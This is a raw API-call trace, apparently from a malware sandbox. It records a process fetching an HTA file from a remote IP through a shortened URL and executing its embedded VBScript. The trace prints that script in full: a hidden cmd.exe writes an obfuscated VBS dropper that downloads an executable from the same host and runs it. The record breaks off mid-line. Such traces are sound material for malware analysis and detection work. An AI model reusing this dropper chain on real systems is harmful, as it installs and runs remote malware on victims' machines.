[0075.242] IUri:GetScheme (in: This=0x84c3fc, pdwScheme=0x33ed94 | out: pdwScheme=0x33ed94*=0xb) returned 0x0
[0075.242] IUri:GetDisplayUri (in: This=0x84c3fc, pbstrDisplayString=0x33eda0 | out: pbstrDisplayString=0x33eda0*="https://urlz.fr/8gYe") returned 0x0
[0075.242] GetWindowTextW (in: hWnd=0x1021a, lpString=0x33e940, nMaxCount=512 | out: lpString="") returned 0
[0075.242] NtdllDefWindowProc_W () returned 0x0
[0075.242] SetWindowTextW (hWnd=0x1021a, lpString="https://urlz.fr/8gYe") returned 1
[0075.242] NtdllDefWindowProc_W () returned 0x1
[0075.243] IUnknown:Release (This=0x84c3fc) returned 0x11
[0075.243] GetCurrentThreadId () returned 0xbf4
[0075.243] GetMessageW (in: lpMsg=0x33fa5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33fa5c) returned 1
[0075.344] TranslateMessage (lpMsg=0x33fa5c) returned 0
[0075.344] DispatchMessageW (lpMsg=0x33fa5c) returned 0x0
[0075.344] GetMessageW (in: lpMsg=0x33fa5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33fa5c) returned 1
[0076.358] TranslateMessage (lpMsg=0x33fa5c) returned 0
[0076.358] DispatchMessageW (lpMsg=0x33fa5c) returned 0x0
[0076.359] CreateUri (in: pwzURI="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x33e1d4 | out: ppURI=0x33e1d4*=0x911444) returned 0x0
[0076.359] IUnknown:QueryInterface (in: This=0x911444, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33e1ac | out: ppvObject=0x33e1ac*=0x911444) returned 0x0
[0076.359] IUnknown:Release (This=0x911444) returned 0xa
[0076.359] IUnknown:AddRef (This=0x911444) returned 0xb
[0076.359] IUnknown:Release (This=0x911444) returned 0xa
[0076.359] IUnknown:Release (This=0x911444) returned 0x9
[0076.359] FindResourceW (hModule=0x73870000, lpName=0x1fe, lpType=0x6) returned 0x3bb84d0
[0076.359] LoadResource (hModule=0x73870000, hResInfo=0x3bb84d0) returned 0x3bde53c
[0076.359] LockResource (hResData=0x3bde53c) returned 0x3bde53c
[0076.359] VirtualQuery (in: lpAddress=0x3bde53c, lpBuffer=0x33f37c, dwLength=0x1c | out: lpBuffer=0x33f37c*(BaseAddress=0x3bde000, AllocationBase=0x3900000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
[0076.359] SizeofResource (hModule=0x73870000, hResInfo=0x3bb84d0) returned 0xe6
[0076.360] GetMessageW (in: lpMsg=0x33fa5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33fa5c) returned 1
[0076.451] TranslateMessage (lpMsg=0x33fa5c) returned 0
[0076.451] DispatchMessageW (lpMsg=0x33fa5c) returned 0x0
[0076.452] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0076.452] IInternetSecurityManager:GetSecurityId (in: This=0x856f08, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pbSecurityId=0x33f350, pcbSecurityId=0x33f34c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f350*=0x68, pcbSecurityId=0x33f34c*=0x17) returned 0x0
[0076.452] IInternetSecurityManager:GetSecurityId (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pbSecurityId=0x33f350, pcbSecurityId=0x33f34c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f350*=0x0, pcbSecurityId=0x33f34c*=0x200) returned 0x800c0011
[0076.453] IUnknown:AddRef (This=0x84c3fc) returned 0xd
[0076.453] IUri:GetPropertyDWORD (in: This=0x84c3fc, uriProp=0x11, pdwProperty=0x33f0cc, dwFlags=0x0 | out: pdwProperty=0x33f0cc*=0xb) returned 0x0
[0076.453] IInternetSecurityManager:GetSecurityId (in: This=0x856f08, pwszUrl="https://urlz.fr/8gYe", pbSecurityId=0x33f128, pcbSecurityId=0x33f124*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f128*=0x68, pcbSecurityId=0x33f124*=0x11) returned 0x0
[0076.453] IInternetSecurityManager:GetSecurityId (in: This=0x74cc96bc, pwszUrl="https://urlz.fr/8gYe", pbSecurityId=0x33f128, pcbSecurityId=0x33f124*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f128*=0x0, pcbSecurityId=0x33f124*=0x200) returned 0x800c0011
[0076.453] IUnknown:Release (This=0x84c3fc) returned 0xd
[0076.453] IInternetSecurityManager:GetSecurityId (in: This=0x856f08, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pbSecurityId=0x33f598, pcbSecurityId=0x33f58c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f598*=0x68, pcbSecurityId=0x33f58c*=0x17) returned 0x0
[0076.453] IInternetSecurityManager:GetSecurityId (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pbSecurityId=0x33f598, pcbSecurityId=0x33f58c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f598*=0x0, pcbSecurityId=0x33f58c*=0x200) returned 0x800c0011
[0076.453] UrlGetLocationW (psz1="http://82.118.242.107/~able/1_ga/al/AXVHa.hta") returned 0x0
[0076.454] CreateUri (in: pwzURI="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x33f564 | out: ppURI=0x33f564*=0x911444) returned 0x0
[0076.454] IUri:GetScheme (in: This=0x911444, pdwScheme=0x33f4fc | out: pdwScheme=0x33f4fc*=0x2) returned 0x0
[0076.454] IUri:IsEqual (in: This=0x84c3fc, pUri=0x911444, pfEqual=0x33f544 | out: pfEqual=0x33f544*=0) returned 0x0
[0076.454] IUnknown:Release (This=0x84c3fc) returned 0xc
[0076.454] IUnknown:AddRef (This=0x911444) returned 0xc
[0076.454] IUri:GetAbsoluteUri (in: This=0x911444, pbstrAbsoluteUri=0x85e1e0 | out: pbstrAbsoluteUri=0x85e1e0*="http://82.118.242.107/~able/1_ga/al/AXVHa.hta") returned 0x0
[0076.454] IUnknown:Release (This=0x911444) returned 0xb
[0076.454] IUnknown:AddRef (This=0x911444) returned 0xc
[0076.454] IUri:GetPropertyDWORD (in: This=0x911444, uriProp=0x11, pdwProperty=0x33f2f4, dwFlags=0x0 | out: pdwProperty=0x33f2f4*=0x2) returned 0x0
[0076.454] IInternetSecurityManager:GetSecurityId (in: This=0x856f08, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pbSecurityId=0x33f358, pcbSecurityId=0x33f354*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f358*=0x68, pcbSecurityId=0x33f354*=0x17) returned 0x0
[0076.454] IInternetSecurityManager:GetSecurityId (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pbSecurityId=0x33f358, pcbSecurityId=0x33f354*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f358*=0x0, pcbSecurityId=0x33f354*=0x200) returned 0x800c0011
[0076.454] IUnknown:Release (This=0x911444) returned 0xb
[0076.455] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", ppmk=0x33f590*=0x0, dwFlags=0x1 | out: ppmk=0x33f590*=0x3739e20) returned 0x0
[0076.455] IUnknown:AddRef (This=0x3739e20) returned 0x2
[0076.455] IUnknown:Release (This=0x84fff0) returned 0x1
[0076.456] CreateUri (in: pwzURI="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x33f560 | out: ppURI=0x33f560*=0x911444) returned 0x0
[0076.456] IUnknown:AddRef (This=0x911444) returned 0xf
[0076.456] IUri:GetAbsoluteUri (in: This=0x911444, pbstrAbsoluteUri=0x85e1e4 | out: pbstrAbsoluteUri=0x85e1e4*="http://82.118.242.107/~able/1_ga/al/AXVHa.hta") returned 0x0
[0076.456] IUnknown:Release (This=0x911444) returned 0xe
[0076.456] ParseURLW (in: pcszURL="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", ppu=0x33f538 | out: ppu=0x33f538) returned 0x0
[0076.456] IUnknown:Release (This=0x3739e20) returned 0x1
[0076.456] SetTimer (hWnd=0x1021e, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008
[0076.456] GetTickCount () returned 0x21351
[0076.457] Sleep (dwMilliseconds=0x0)
[0076.461] GetTickCount () returned 0x21351
[0076.461] IUnknown:AddRef (This=0x911444) returned 0x11
[0076.462] IInternetSecurityManager:MapUrlToZone (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pdwZone=0x33f45c, dwFlags=0x0 | out: pdwZone=0x33f45c*=0xffffffff) returned 0x800c0011
[0076.462] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0076.462] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0076.462] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0076.462] IInternetSecurityManager:ProcessUrlAction (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwAction=0x2106, pPolicy=0x33f460, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x33f460*=0x0) returned 0x0
[0076.462] IUnknown:Release (This=0x911444) returned 0x10
[0076.462] GetTickCount () returned 0x21351
[0076.463] GetTickCount () returned 0x21351
[0076.463] GetTickCount () returned 0x21351
[0076.464] GetTickCount () returned 0x21351
[0076.464] ParseURLW (in: pcszURL="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", ppu=0x33f698 | out: ppu=0x33f698) returned 0x0
[0076.464] IUnknown:AddRef (This=0x911444) returned 0x11
[0076.464] IInternetSecurityManager:MapUrlToZone (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pdwZone=0x33f63c, dwFlags=0x0 | out: pdwZone=0x33f63c*=0xffffffff) returned 0x800c0011
[0076.464] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0076.464] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0076.464] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0076.464] IInternetSecurityManager:ProcessUrlAction (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwAction=0x1400, pPolicy=0x33f640, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x33f640*=0x0) returned 0x0
[0076.464] IUnknown:Release (This=0x911444) returned 0x10
[0076.464] GetTickCount () returned 0x21351
[0076.464] GetTickCount () returned 0x21351
[0076.464] ParseURLW (in: pcszURL="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", ppu=0x33f654 | out: ppu=0x33f654) returned 0x0
[0076.464] IUnknown:AddRef (This=0x911444) returned 0x11
[0076.464] IInternetSecurityManager:MapUrlToZone (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pdwZone=0x33f5f4, dwFlags=0x0 | out: pdwZone=0x33f5f4*=0xffffffff) returned 0x800c0011
[0076.465] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0076.465] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0076.465] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0076.465] IInternetSecurityManager:ProcessUrlAction (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwAction=0x1400, pPolicy=0x33f5f8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x33f5f8*=0x0) returned 0x0
[0076.465] IUnknown:Release (This=0x911444) returned 0x10
[0076.465] ParseURLW (in: pcszURL="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", ppu=0x33f5e4 | out: ppu=0x33f5e4) returned 0x0
[0076.465] IUnknown:AddRef (This=0x911444) returned 0x11
[0076.465] IInternetSecurityManager:MapUrlToZone (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pdwZone=0x33f584, dwFlags=0x0 | out: pdwZone=0x33f584*=0xffffffff) returned 0x800c0011
[0076.465] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0076.465] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0076.465] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0076.465] IInternetSecurityManager:ProcessUrlAction (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwAction=0x1400, pPolicy=0x33f588, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x33f588*=0x0) returned 0x0
[0076.465] IUnknown:Release (This=0x911444) returned 0x10
[0076.465] FaultInIEFeature (in: hWnd=0x1021e, pClassSpec=0x33f5b0, pQuery=0x0, dwFlags=0x0 | out: pQuery=0x0) returned 0x1
[0076.466] CoCreateInstance (in: rclsid=0x33f5d4*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x748e95b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x33f590 | out: ppv=0x33f590*=0x2e51390) returned 0x0
[0076.773] __dllonexit () returned 0x73747164
[0076.774] __dllonexit () returned 0x7374717e
[0076.774] __dllonexit () returned 0x73747198
[0076.774] GetUserDefaultLCID () returned 0x409
[0076.774] GetVersion () returned 0x1db10106
[0076.774] DllGetClassObject (in: rclsid=0x852f90*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), riid=0x75d3ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e854 | out: ppv=0x33e854*=0xadff90) returned 0x0
[0076.775] VBScriptEngine5:IClassFactory:CreateInstance (in: This=0xadff90, pUnkOuter=0x0, riid=0x33f200*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x33e840 | out: ppvObject=0x33e840*=0x2e51390) returned 0x0
[0076.775] GetUserDefaultLCID () returned 0x409
[0076.775] GetACP () returned 0x4e4
[0076.775] VBScriptEngine5:IUnknown:AddRef (This=0x2e51390) returned 0x2
[0076.775] VBScriptEngine5:IUnknown:Release (This=0x2e51390) returned 0x1
[0076.775] VBScriptEngine5:IUnknown:Release (This=0xadff90) returned 0x0
[0076.776] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x2e51390, riid=0x748e95b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x33f534 | out: ppvObject=0x33f534*=0x2e51390) returned 0x0
[0076.776] VBScriptEngine5:IUnknown:Release (This=0x2e51390) returned 0x1
[0076.776] IUnknown:AddRef (This=0x911444) returned 0x11
[0076.776] IInternetSecurityManager:MapUrlToZone (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", pdwZone=0x33f4a4, dwFlags=0x0 | out: pdwZone=0x33f4a4*=0xffffffff) returned 0x800c0011
[0076.776] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0076.776] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0076.776] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0076.776] IInternetSecurityManager:ProcessUrlAction (in: This=0x74cc96bc, pwszUrl="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", dwAction=0x1401, pPolicy=0x33f4a8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x33f4a8*=0x0) returned 0x0
[0076.776] IUnknown:Release (This=0x911444) returned 0x10
[0076.777] GetCurrentThreadId () returned 0xbf4
[0076.777] GetCurrentThreadId () returned 0xbf4
[0076.778] GetCurrentThreadId () returned 0xbf4
[0076.778] GetCurrentThreadId () returned 0xbf4
[0076.778] GetCurrentThreadId () returned 0xbf4
[0076.778] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0076.778] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x33f3dc, cchData=6 | out: lpLCData="1252") returned 5
[0076.778] IsValidCodePage (CodePage=0x4e4) returned 1
[0076.778] CoCreateInstance (in: rclsid=0x7373b234*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7373b244*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2e5156c | out: ppv=0x2e5156c*=0x36fd610) returned 0x0
[0076.778] IUnknown:AddRef (This=0x36fd610) returned 0x2
[0076.778] GetCurrentProcessId () returned 0xbf0
[0076.778] GetCurrentThreadId () returned 0xbf4
[0076.778] GetTickCount () returned 0x2140c
[0076.778] ISystemDebugEventFire:BeginSession (This=0x36fd610, guidSourceID=0x7373b308, strSessionName="VBScript:00003056:00003060:18136204") returned 0x0
[0076.779] GetCurrentThreadId () returned 0xbf4
[0076.779] GetCurrentThreadId () returned 0xbf4
[0076.779] GetCurrentThreadId () returned 0xbf4
[0076.779] StrCmpICW (pszStr1="window", pszStr2="window") returned 0
[0076.780] GetCurrentThreadId () returned 0xbf4
[0076.780] GetProcAddress (hModule=0x76720000, lpProcName=0x2) returned 0x76724642
[0076.781] StrCmpIW (psz1="http://82.118.242.107/~able/1_ga/al/AXVHa.hta", psz2="http://82.118.242.107/~able/1_ga/al/AXVHa.hta") returned 0
[0076.781] GetCurrentThreadId () returned 0xbf4
[0076.781] _wcsicmp (_String1="window", _String2="window") returned 0
[0076.781] _wcsicmp (_String1="", _String2="") returned 0
[0076.781] SysStringLen (param_1="\r\nSet objShell = CreateObject(\"Shell.Application\")\r\nobjShell.ShellExecute \"cmd.exe\", \"/c CD %temp% & @echo set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"\"wscript.shell\"\") >ZMXZAA.vBS & @echo Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x >>ZMXZAA.vBS & @echo Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w >>ZMXZAA.vBS & @echo Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e >>ZMXZAA.vBS & @echo Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i >>ZMXZAA.vBS & @echo X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"\"http://82.118.242.107/~able/1_ga/al/al.exe\"\" >>ZMXZAA.vBS & @echo R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"\"JSTCHV.eXe\"\" >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"\"MSXML2.XMLHTTP\"\") >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"\"GET\"\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\"\"\") >>ZMXZAA.vBS & @echo If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then >>ZMXZAA.vBS & @echo Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"\"ADODB.Stream\"\") >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close >>ZMXZAA.vBS & @echo Set nE= Nothing >>ZMXZAA.vBS & @echo End If >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing >>ZMXZAA.vBS & @echo WScript.Sleep(5000) >>ZMXZAA.VBs& @echo H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) >>ZMXZAA.vBS & sTaRt ZMXZAA.vbs \", \"\", \"\", 0\r\nself.close\r\n") returned 0x7fa
[0076.784] ISystemDebugEventFire:IsActive (This=0x36fd610) returned 0x1
[0076.784] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x33f1e4 | out: lpclsid=0x33f1e4*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
[0076.788] SysStringLen (param_1=0x0) returned 0x0
[0076.788] GetProcAddress (hModule=0x75cf0000, lpProcName="CoGetClassObject") returned 0x75d254ad
[0076.788] CoGetClassObject (in: rclsid=0x33f1e4*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x73734174*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f1d4 | out: ppv=0x33f1d4*=0x76bb2998) returned 0x0
[0076.790] Shell:IUnknown:QueryInterface (in: This=0x76bb2998, riid=0x73741100*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x33f1d0 | out: ppvObject=0x33f1d0*=0x0) returned 0x80004002
[0076.791] Shell:IClassFactory:CreateInstance (in: This=0x76bb2998, pUnkOuter=0x0, riid=0x737340a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33f1d8 | out: ppvObject=0x33f1d8*=0x36ea670) returned 0x0
[0076.801] Shell:IUnknown:Release (This=0x76bb2998) returned 0x1
[0076.801] Shell:IUnknown:QueryInterface (in: This=0x36ea670, riid=0x73740580*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x33f19c | out: ppvObject=0x33f19c*=0x36ea690) returned 0x0
[0076.802] Shell:IObjectWithSite:SetSite (This=0x36ea690, pUnkSite=0x2e59318) returned 0x0
[0076.802] Shell:IUnknown:AddRef (This=0x2e59318) returned 0x2
[0076.807] Shell:IUnknown:Release (This=0x36ea690) returned 0x1
[0076.807] Shell:IUnknown:QueryInterface (in: This=0x36ea670, riid=0x73734140*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33f18c | out: ppvObject=0x33f18c*=0x36ea670) returned 0x0
[0076.807] Shell:IUnknown:AddRef (This=0x36ea670) returned 0x3
[0076.807] Shell:IUnknown:Release (This=0x36ea670) returned 0x2
[0076.807] Shell:IUnknown:Release (This=0x36ea670) returned 0x1
[0076.808] GetCurrentThreadId () returned 0xbf4
[0076.808] _wcsicmp (_String1="window", _String2="window") returned 0
[0076.808] GetCurrentThreadId () returned 0xbf4
[0076.808] GetCurrentThreadId () returned 0xbf4
[0076.808] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0076.808] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0076.810] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0076.810] IsCharSpaceW (wch=0x6f) returned 0
[0076.810] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0076.810] IsCharSpaceW (wch=0x6f) returned 0
[0076.810] Shell:IUnknown:AddRef (This=0x36ea670) returned 0x2
[0076.811] Shell:IUnknown:QueryInterface (in: This=0x36ea670, riid=0x737319c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33f274 | out: ppvObject=0x33f274*=0x0) returned 0x80004002
[0076.811] Shell:IDispatch:GetIDsOfNames (in: This=0x36ea670, riid=0x7373190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f278*="ShellExecute", cNames=0x1, lcid=0x409, rgDispId=0x33f290 | out: rgDispId=0x33f290*=1610809345) returned 0x0
[0076.820] Shell:IUnknown:AddRef (This=0x36ea670) returned 0x2
[0076.820] Shell:IUnknown:QueryInterface (in: This=0x36ea670, riid=0x737319c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33f27c | out: ppvObject=0x33f27c*=0x0) returned 0x80004002
[0076.820] Shell:IDispatch:Invoke (in: This=0x36ea670, dispIdMember=1610809345, riid=0x7373190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x33f248*(rgvarg=([0]=0x2e59280*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x2e59290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [2]=0x2e592a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x2e592b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="/c CD %temp% & @echo set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") >ZMXZAA.vBS & 